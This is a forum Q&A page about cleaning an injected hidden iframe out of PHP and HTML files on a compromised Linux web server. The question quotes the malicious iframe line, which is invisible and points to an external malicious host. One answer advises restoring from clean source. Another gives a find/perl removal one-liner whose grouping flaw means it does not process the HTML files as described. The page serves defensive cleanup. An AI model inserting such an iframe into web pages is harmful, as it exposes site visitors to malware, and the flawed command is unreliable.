Reputation: 11
Iframe virus, need to be removed from all phps and html file on linux server
The following line has been added to almost all the php files and some of the html files on my linux server WHat is the command to remove this without damaging anything else?
iframe qoluu='V5pEXGSm' src='http://getrelax4you.com/in.cgi?7 ' width='98' height='407' style='display:none'>
The beginning and end of the above line has < >
and will the command search all folders?
Upvotes: 1
Views: 468
Answers (2)
Reputation: 63576
Your server has been compromised, simply restore the site files on to a clean server, from your source code repository.
Fixing any user data up may be more tricky, you can no longer trust the contents of your db, so you have to be very careful. Better luck next time.
Upvotes: 3
Reputation: 24574
Simplified solution, assuming that all virus code is on a single line:
find /www/directory -name '*.html' -o -name '*.php' -exec perl -i -ne 'print unless /getrelax4you\.com/' '{}' \;
Short explanation: visit all files under /www/directory with html or php extension. Use perl to edit each file in place by copying all lines verbatim to output, unless they contain string "getrelax4you.com"; which are removed.
Caveat emptor! Make backup before trying this; i might have missed some small detail.
Upvotes: 2
Related Questions
- Virus/malware modifying .htaccess on Joomla CMS website
- Malware uploaded on Server
- malware | my php files on apache server is being changed
- PHP files are infected with SiteLock-PHP-BACKDOOR-GENERIC-co.UNOFFICIAL
- How can i remove an iframe virus from all of php files on my website?
- Find iframe injection and remove from site
- Cleaning up iframe malware
- Looking for script to delete iframe malware from linux server
- Found This Hack in my web server php files
- Iframe malicious code in PHP files?